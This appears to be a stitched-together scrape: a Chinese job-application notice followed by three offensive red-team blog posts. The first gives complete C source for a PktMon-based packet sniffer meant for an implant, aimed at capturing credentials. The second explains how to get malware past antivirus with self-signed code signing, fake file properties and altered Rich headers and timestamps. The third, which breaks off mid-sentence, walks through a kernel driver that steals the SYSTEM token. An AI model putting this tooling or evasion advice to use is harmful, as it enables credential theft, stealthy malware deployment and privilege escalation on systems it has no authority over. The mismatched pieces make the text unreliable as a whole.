我們會在兩週內主動與您聯繫,招募過程依序為書面審核、線上測驗以及面試三個階段。第二階段的線上測驗最快將於七月底進行,煩請耐心等候;第三階段面試視疫情狀況可能會採線上面試。 若有應徵相關問題,請一律使用 Email 聯繫,造成您的不便請見諒。我們感謝您的來信,期待您的加入!
Dear Fellowlship, today’s homily is about how to add a sniffer to our implant. To accomplish this task we are going to dissect the native tool PktMon.exe, so we can learn about its internals in order to emulate its functionalities. Please, take a seat and listen to the story.
In this article we are going to touch on some topics that we are not familiar with, so it is possible that we make some minor mistakes. If you find any, please do not hesitate to contact us so we can correct it.
Some years ago we had to face a Red Team operation where at some point we discovered that a lot of machines were running a Backup service. This Backup service was old as hell and it was composed by a central node and agents installed in each machine that were enrolled in this “central server”.
When a management task had to be executed (for example, to schedule a backup or to check agent stats) the central node sent the order to the target machine. To load those orders the central server had to authenticate against each agent and here comes the magic: the authentication was unencrypted and shared between machines. Getting those credentials meant RCE in all the machines that had the agent installed (to perform a backup task you could configure arbitrary pre/post system commands, so it was a insta-pwn). A lot of techniques can be used to intercept those credentials (injecting a hook, reversing the application in order to understand how the credentials are saved…), but undoubtedly the easiest and painless way is to use a sniffer.
Today most of the communications between services are encrypted (SSL/TLS ftw!) and a sniffer inside a Red Team operation or a pentest is something that you are going to use only in a corner-case. But learning new things is always useful: you never know when this info can save your ass. So here we are! Let’s build a shitty PoC able to sniff traffic!
In windows we have the utility PktMon:
Packet Monitor (Pktmon) is an in-box, cross-component network diagnostics tool for Windows. It can be used for packet capture, packet drop detection, packet filtering and counting. The tool is especially helpful in virtualization scenarios, like container networking and SDN, because it provides visibility within the networking stack. Packet Monitor is available in-box via pktmon.exe command on Windows 10 and Windows Server 2019 (Version 1809 and later).
As the descriptions states, it is exactly the place where we should start to peek an eye.
Before feeding our disassembler with PktMon.exe we can extract some clues about what we should focus. First in the syntax page we have this text:
Packet Monitor generates log files in ETL format. There are multiple ways to format the ETL file for analysis
We can deduce that we are interested in code related with Event Trace Log files. Also the documentation for pktmon unload
states:
Stop the PktMon driver service and unload PktMon.sys. Effectively equivalent to ‘sc.exe stop PktMon’. Measurement (if active) will immediately stop, and any state will be deleted (counters, filters, etc.).
If sc
is related, it means that we are going to deal with services. So the first thing to look are functions related with “service”. With the symbol search in Binary Ninja we can find that OpenServiceW
is used with the parameter “PktMon”, so it rings the bell.
Checking for cross-references leads us to this other function, where we can see clearly how it calls our renamed OpenService_PktMon
(where the OpenServiceW was located) and if everything goes OK it opens the device “PktMonDev”.
So far we know that our PktMon start a service called “PktMon” and it opens a handle to the device “PktMonDev”. Playing with drivers means that we are going to deal with IOCTL codes. Indeed if we check again for cross-references we can see how the handle obtained before is used in a DeviceIoControl
call:
At this point we can use a mix of static and dynamic analysis to check what IOCTLs are used and for what task. Just run PktMon start -c --pkt-size 0
inside a debugger, put a breakpoint at DeviceIoControl
and check where the IOCTL appears in the disassembly (the same approach can be done with Frida or any other tool that let you hook the function to check the parameters).
After one hour wasted reversing this (yeah, we are slow as hell because our skills doing RE are close to zero) we noticied that in System32 exists a DLL called PktMonApi.dll
… and if you check the exports…
So… yes, we could save a lot of time to understand what does each call to DeviceIoControl by just looking this DLL. Shame on us!
The IOCTL for the “start” parameter is 0x220404
. Let’s check the registers when DeviceIoControl
is called with this code:
RAX : 0000000000000000
RBX : 0000000000220404
RCX : 0000000000000188 <= Handle to \\.\PktMonDev
RDX : 0000000000220404 <= IOCTL for "PktMonStart"
RBP : 0000000000000188
RSP : 00000077D027FC28
RSI : 00000077D027FDB8
RDI : 0000000000000014
R8 : 00000077D027FDB8 <= Input buffer
R9 : 0000000000000014 <= Input size
R10 : 00000FFF26BD722B
R11 : 00000077D027FCC0
R12 : 0000000000000000
R13 : 00000192BDDE0570
R14 : 0000000000000001
R15 : 0000000000000000
RIP : 00007FF935E9AC00 <kernelbase.DeviceIoControl>
To get the input transmited to the driver we just have to read R9
bytes at address contained in R8
:
0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00
This message tells the driver that should start capturing fully packets (by default the packets are truncated to 128 bytes, with --pkt-size 0
we disable this limit).
If we want to add a filter (because we are only interested in a service that uses X port) we need to use the IOCTL 0x220410
which uses a bigger input (0xD8 bytes) with the next layout:
As we can see the marked XX II bytes corresponds to the port. If we want to capture the traffic exchanged in port 14099, our input buffer will be:
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
(...)
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
(...)
So far at this point we know how to communicate with the driver in order to initate the capture of traffic and how to set capture filters based on ports. But… how are we going to collect and save the data? The MSDN page stated that packets are saved as ETL. Let’s search for symbols related to event logging!
If we set a breakpoint on those functions and run PktMon.exe we are going to hit them. We are interested in EnableTraceEx2 because it receives as parameter the provider GUID which indicates the event trace provider we are going to enable.
RAX : 0000000000000012
RBX : 0000017419FE01B0
RCX : 000000000000001A
RDX : 0000017419FE01B0
RBP : 0000003FB196F650
RSP : 0000003FB196F548
RSI : 0000017419FE01F0
RDI : 0000000000000000
R8 : 0000000000000001
R9 : 0000000000000004
R10 : 0000017419FC0000
R11 : 0000003FB196F430
R12 : 0000000000000000
R13 : 0000017419FE01B0
R14 : 0000000000000000
R15 : 0000000000000001
RIP : 00007FF8F7389910 <sechost.EnableTraceEx2>
The GUID is a 128-bit value. Let’s retrieve it from 17419FE01B0
:
D9 80 4F 4D BD C8 73 4D BB 5B 19 C9 04 02 C5 AC
This translates to the GUID {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}
. If we google this value we reach this reference from Microsoft’s repo that confirms the value:
(...)
[RegisterBefore(NetEvent.UserData, MicrosoftWindowsPktMon, "{4d4f80d9-c8bd-4d73-bb5b-19c90402c5ac}")]
(...)
To recap:
\\.\PktMonDev
device.0x220410
to set the filter and 0x220404
to start capturing trafficOoook. We have enough info to start to build our PoC
MSDN provides an example of how to start a trace session. We are going to use this example as base to enable the trace:
//...
#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"
//...
DWORD initiateTrace(void) {
static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };
static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}
// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
ULONG status = ERROR_SUCCESS;
TRACEHANDLE sessionHandle = 0;
PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
ULONG bufferSize = 0;
BOOL TraceOn = TRUE;
bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);
ZeroMemory(pSessionProperties, bufferSize);
pSessionProperties->Wnode.BufferSize = bufferSize;
pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
pSessionProperties->Wnode.Guid = sessionGuid;
pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
pSessionProperties->MaximumFileSize = 50; // 50 MB
pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);
status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
if (status != ERROR_SUCCESS) {
printf("[!] StartTraceA failed!\n");
return -1;
}
status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
if (status != ERROR_SUCCESS) {
printf("[!] EnableTraceEx2 failed!\n");
return -1;
}
return 0;
}
//...
As this is just a PoC we are going to use EVENT_TRACE_FILE_MODE_CIRCULAR
file mode. Exists different logging modes that can fit better for our purposes (for example generating a new file each time we reach the maximum size, so you can delete older files).
Implementing the driver communication is easy because the pseudocode obtained from Binary Ninja is pretty clear. First, let’s start the service and open a handle to the device:
//...
HANDLE PktMonServiceStart(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
HANDLE hDriver;
BOOL status;
hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
if (!hManager) {
return NULL;
}
hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
CloseServiceHandle(hManager);
status = StartServiceA(hService, 0, NULL);
CloseServiceHandle(hService);
hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
if (hDriver == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDriver;
}
//...
In our PoC we are going to create a filter to intercept the traffic throught 14099 port (yeah we love 1337 jokes) and then start capturing the traffic:
//...
DWORD initiateCapture(HANDLE hDriver) {
BOOL status;
DWORD IOCTL_start = 0x220404;
DWORD IOCTL_filter = 0x220410;
LPVOID IOCTL_start_InBuffer = NULL;
DWORD IOCTL_start_bytesReturned = 0;
char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };
LPVOID IOCTL_filter_InBuffer = NULL;
DWORD IOCTL_filter_bytesReturned = 0;
char IOCTL_filter_message[0xD8] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
if (!status) {
printf("[!] Error! Filter creation failed!\n");
return -1;
}
IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
if (status) {
return 0;
}
return -1;
}
//...
All the parts are created, we only need to glue them together :).
Keep in mind that in this PoC we did not clean up anything!!. For that you need to add code that:
EVENT_CONTROL_CODE_DISABLE_PROVIDER
and EVENT_TRACE_CONTROL_STOP
)After this warning, here is the shitty PoC:
/* Shabby PktMon (PoC) by Juan Manuel Fernandez (@TheXC3LL) */
#include <windows.h>
#include <stdio.h>
#include <evntrace.h>
#include <strsafe.h>
#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"
HANDLE PktMonServiceStart(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
HANDLE hDriver;
BOOL status;
hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
if (!hManager) {
return NULL;
}
hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
CloseServiceHandle(hManager);
status = StartServiceA(hService, 0, NULL);
CloseServiceHandle(hService);
hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
if (hDriver == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDriver;
}
DWORD initiateCapture(HANDLE hDriver) {
BOOL status;
DWORD IOCTL_start = 0x220404;
DWORD IOCTL_filter = 0x220410;
LPVOID IOCTL_start_InBuffer = NULL;
DWORD IOCTL_start_bytesReturned = 0;
char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };
LPVOID IOCTL_filter_InBuffer = NULL;
DWORD IOCTL_filter_bytesReturned = 0;
char IOCTL_filter_message[0xD8] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
if (!status) {
printf("[!] Error! Filter creation failed!\n");
return -1;
}
IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
if (status) {
return 0;
}
return -1;
}
DWORD initiateTrace(void) {
static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };
static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}
// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
ULONG status = ERROR_SUCCESS;
TRACEHANDLE sessionHandle = 0;
PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
ULONG bufferSize = 0;
BOOL TraceOn = TRUE;
bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);
ZeroMemory(pSessionProperties, bufferSize);
pSessionProperties->Wnode.BufferSize = bufferSize;
pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
pSessionProperties->Wnode.Guid = sessionGuid;
pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
pSessionProperties->MaximumFileSize = 50; // 50 MB
pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);
status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
if (status != ERROR_SUCCESS) {
printf("[!] StartTraceA failed!\n");
return -1;
}
status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
if (status != ERROR_SUCCESS) {
printf("[!] EnableTraceEx2 failed!\n");
return -1;
}
return 0;
}
int main(int argc, char** argv) {
HANDLE hDriver;
printf("\t\t-=[ Shabby PktMon by @TheXC3LL ]=-\n\n");
printf("[*] Starting PktMon service...\n");
hDriver = PktMonServiceStart();
if (hDriver == NULL) {
printf("\t[!] Error! Service PktMon could not be started!\n\n");
return -1;
}
printf("\t[+] SERVICE STARTED SUCCESSFULLY! (Handle: %d)\n", hDriver);
printf("[*] Initating Event Tracer...\n");
if (initiateTrace() == -1) {
printf("\t[!] Error! Could not start the event tracer!\n");
return -1;
}
printf("\t[+] EVENT TRACER STARTED SUCCESSFULLY!\n");
printf("[*] Adding a filter and initializing capture...\n");
if (initiateCapture(hDriver) == -1) {
printf("\t[!] Error! Could not start capturing!\n");
return -1;
}
printf("\n[+] CAPTURE INITIATED SUCCESSFULLY!\n");
return 0;
}
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
During red team operations and penetration tests, there are occasions where you need to drop an executable to disk. It’s usually best to stay in memory and avoid this if possible, but there are plenty of situations where it’s unavoidable, like DLL sideloading. In these cases, you typically drop a custom malicious PE file of some sort. Being on disk instead of in memory opens you up to the world of AV static analysis and the set of challenges bypassing it presents. There are many resources on the net about avoiding AV signatures, say for example Metasploit shellcode, by using string obfuscation, encryption, XORs, pulling down staged payloads over the network, shrinking the import table, polymorphic encoding, etc. I’m going to assume you’ve done your due diligence and handled the big stuff. However there are some other more subtle indicators and heuristics AV can use to help spot a malicious binary when it is present on disk. These are what this post is all about.
When you compile a binary, whether it’s a DLL or an EXE, the compiler will automatically include a certain amount of metadata about the resulting binary, such as the compliation date and time, compiler vendor, debug files, file paths, etc. This “data about data” can reveal a lot about an executable, especially an executable never encountered by a given AV engine.
The AV engine’s job is to take files, inspect the metadata, apply heuristics, and determine liklihood of it being malicious. Clearly the more metadata and information we leave in our dropped binary, the more likely it is to be flagged. We are automatically at a disadvantage, since we are writing custom code that has never been seen by the AV engine and its file hash is unfamiliar. Compare that to a very commonly-seen file, like a Firefox installer MSI with a known hash and metadata, seen by many installations of the AV software across customer locations, and you can see how a custom compiled binary can stick out.
All is not lost, however. AV can’t simply declare every newly-seen file malicious, as all known-good files start off as unknown at some point. So the AV must use imperfect signatures, metadata, and heuristics to make a good vs. bad determination. We want to remove as many pieces of information that could push us towards a positive dectection as we can.
Now will making these changes make your malicious payload FUD and guaranteed to slip through? Not at all. If you’re dropping unencrypted Cobalt Strike shellcode all over the place, you’re done. But as AV and EDR gets better, the more important it is to give them as little information as possible. And who wants to burn a perfectly crafted custom payload beacuse you left some silly string in? It’s not a magic bullet, it’s not even an ordinary unmagical bullet, but every little bit helps.
One way developers can help signal to Windows and AV engines that their software is not malicious is by using code signing certs. These are (supposed to be) expensive and difficult to obtain x.509 certificates that can be used to cryptographically sign a compiled binary. The idea is that only the legitimate and properly vetted owner should have access to the private key, and must have legitimately signed the file, indicating that it is trustworthy. This gives AV a high fidelity way of identifying the author.
There are two problems with this approach though. Stuxnet famously stole multiple valid code signing certs in order to sign its payloads and help avoid detection. Certificate private keys occasionally end up committed to Github as well. So a validly signed cert is never a 100% guarantee of non-maliciousness.
The other issue is that sometimes AV engines fail to check the validity of a certificate at all, instead simply checking to see if the file has been signed. Which means as long as we can sign our payload with any old self-signed cert, we would pass this particular check. Lucky for us, anyone can generate a code signing cert and use it to sign their malware. It’s free and easy to automate. This Stack Overflow post shows how to create one on Windows and how to use signtool
to sign a binary. On Linux, you can use Limelighter to sign with an existing certificate, or download the cert from a website and use it as a code signing cert:
And the resulting self-signed binary:
CarbonCopy is another good tool that can use website certificates to sign a file.
Another piece of data, or rather lack of data, are the file properties of an executable. By default, this information is not included when you compile a binary. It looks like this:
It must be added via a resource file and compiled into the binary. This missing information is another, somewhat low fidelity, indicator that a file may not have been produced by a legitimate software vendor, and is therefore more likely to be malicious. Admittedly, this is probably not a huge red flag to most AV, but it’s easy enough to implement, so why not? The details add up.
Creating the resource file is not the most straightforward process. I found the easiest way was to let Visual Studio create it for me. You create a new item of the type resource, and then add a Version resource. Tweak it how you’d like, and the save the resulting Resource.rc
file. I’ve created one and stripped out the extraneous lines for easy use here.
Here are two gists for creating the object file to include with your compilation sources: Windows and Linux. Thanks to Sektor7 for the Windows version.
Here is the result of including a resource file during compilation:
The Rich header is an undocumented field within the PE header of Windows executables that were created by a Microsoft compiler. It captures some information about the compilation process, including the compiler and linker versions, number of files compiled, objects created, etc. It has been covered in some depth in several places, but a good recap and analysis is here.
Because this header encodes rather specific information about an executable, it provides a way of tracking it between systems. AV engines can use it match up strains of malware, attribution, etc. Some threat actors are aware of this fact however, and try to use it to their advantage. The most well-known case of this was the OlympicDestroyer malware, which spoofed its Rich header to resemble the Lazarus group.
I don’t have code or specific recommendations here, mainly because what you might want to do with the Rich header will depend on what you want to acheive. It is worth knowing about, because it is an indicator that you can use, or have used against you. For instance, the GCC compiler doesn’t include the Rich header. If the environment you’re operating in is dominated by Windows machines, much of the software runnning was likely compiled by Visual Studio. Running a GCC or MinGW compiled binary alone isn’t enough on its own to get you caught, but it may make you stand out, which can often mean the same thing. So you may want to add a Rich header, or remove it, or change it to emulate an adversary, or do nothing at all with it. Just know that it exists, and be aware of what it might tell the opposition about your file. Knowledge is power after all.
If you would like to at least remove the Rich header, peupdate can handle that for you. Another option would be one of the PE parsing Python libraries.
Here is a breakdown of the Rich header, courtesy of the wonderful PE-bear. Note the references to masm and the Visual Studio version used.
Another indicator AV can use to help determine maliciousness in a file is the compilation time. The idea is that most software will have been compiled some time in the past before it is used. A very recently compiled binary, say within the past day or even hour, could look very suspicious, especially running on Bob in HR’s machine, who probably isn’t doing any programming. Even a signed binary with no other obvious signs of being malicious, depending on the compile time, can look mighty strange. As always, context matters. If by chance you’ve breached the development network, new binaries are business as usual.
One complication with timestamps in a PE file is the sheer number of them. This post puts the number at 8, though some are not always included, or are simply for managing bound imports and are not full timestamps. A tool is included for viewing them, and tools like PEStudio are great for this as well. Two commonly modified timestamps are the TimeDateStamp
of the COFF File Header, and the TimeDateStamp
field of the debug directory:
Like the Rich header, timestamps are not something that must be changed. They are just another piece of information to be aware of, something that can tell the blue team a story. You get to decide what story is appropriate, depending on the context of the engagment.
For an excellent deep dive into timestamps, I recommend this blog post.
The main theme of this post has been about knowing the little details of the malware you write, and the context in which you deploy that malware. Context matters, details add up, and they can make or break an engagement. I hope this list of subtleties will come in handy on your next engagement.
I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS
and _TOKEN
kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.
The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.
A common method of escalating privileges via buggy drivers or kernel mode exploits is to the steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.
Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.
_EPROCESS
StructureEach process is represented in the kernel by a doubly linked list of _EPROCESS
structures. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token
. Technically this member is of type _EX_FAST_REF
, but for our purposes, this is just an implementation detail. This Token
member contains a pointer to the address of the token object belonging to that particular process. An image of this member within the _EPROCESS
structure in WinDbg can be seen below:
As you can see, the Token
member is located at a fixed offset from the beginning of the _EPROCESS
structure. This seems to change between versions of Windows, and on my test machine running Windows 10 20H2, the offset is 0x4b8
.
Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS
structure of the process we want to steal from, go to the Token
member offset, save the address that it is pointing to, and copy it to the corresponding Token
member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.
In lieu of exploiting a kernel mode exploit, I write a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.
The driver will find the _EPROCESS
structure for each PID, find the Token
members, and copies the target process token to the destination process.
The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW
and then calling DeviceIoControl
with the correct IOCTL.
The code for the token copying is pretty straight forward. In the main function for handling IOCTLs, HandleDeviceIoControl
, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN
, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS
structure:
Once we have the _EPROCESS
address, we can use the offset of 0x4b8
to find the Token
member address:
We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:
Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:
Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, is the PID of the System
process, and is usually always 4. We see that the driver was accessed and the PIDs passed to it successfully:
In the debug output view, we can see that HandleDeviceIoControl
is called with the IOCTL_STEAL_TOKEN
